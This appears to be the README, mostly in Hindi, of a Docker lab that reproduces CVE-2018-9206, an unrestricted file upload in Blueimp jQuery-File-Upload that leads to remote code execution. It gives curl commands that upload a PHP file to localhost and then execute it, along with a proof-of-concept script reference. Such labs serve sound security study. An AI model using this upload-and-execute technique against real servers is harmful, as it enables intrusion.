
Docker-आधारित प्रयोगशाला वातावरण CVE-2018-9206 (Blueimp jQuery-File-Upload असीमित फ़ाइल अपलोड से RCE) के लिए PoC स्क्रिप्ट और सत्यापन कमांड के साथ।
CVE-2018-9206 के लिए असुरक्षित Docker वातावरण - Blueimp jQuery-File-Upload <= 9.22.0 में अनियंत्रित फ़ाइल अपलोड।
docker compose up -d --build
ऐप इस पते पर उपलब्ध: http://localhost:8888/jQuery-File-Upload/
# Upload a PHP file
curl -X POST "http://localhost:8888/jQuery-File-Upload/server/php/index.php" \
-F 'files[]=@/dev/stdin;filename=test.php' <<< '<?php echo "CVE-2018-9206-PWNED"; ?>'
# Execute it
curl "http://localhost:8888/jQuery-File-Upload/server/php/files/test.php"
# Output: CVE-2018-9206-PWNED
या PoC स्क्रिप्ट चलाएँ:
./scripts/poc.sh
docker compose down -v
| फ़ील्ड | मान |
|---|---|
| CVE | CVE-2018-9206 |
| उत्पाद | Blueimp jQuery-File-Upload |
| संस्करण | 9.22.0 |
| प्रकार | अनियंत्रित फ़ाइल अपलोड → RCE |
| CVSS | 9.8 (गंभीर) |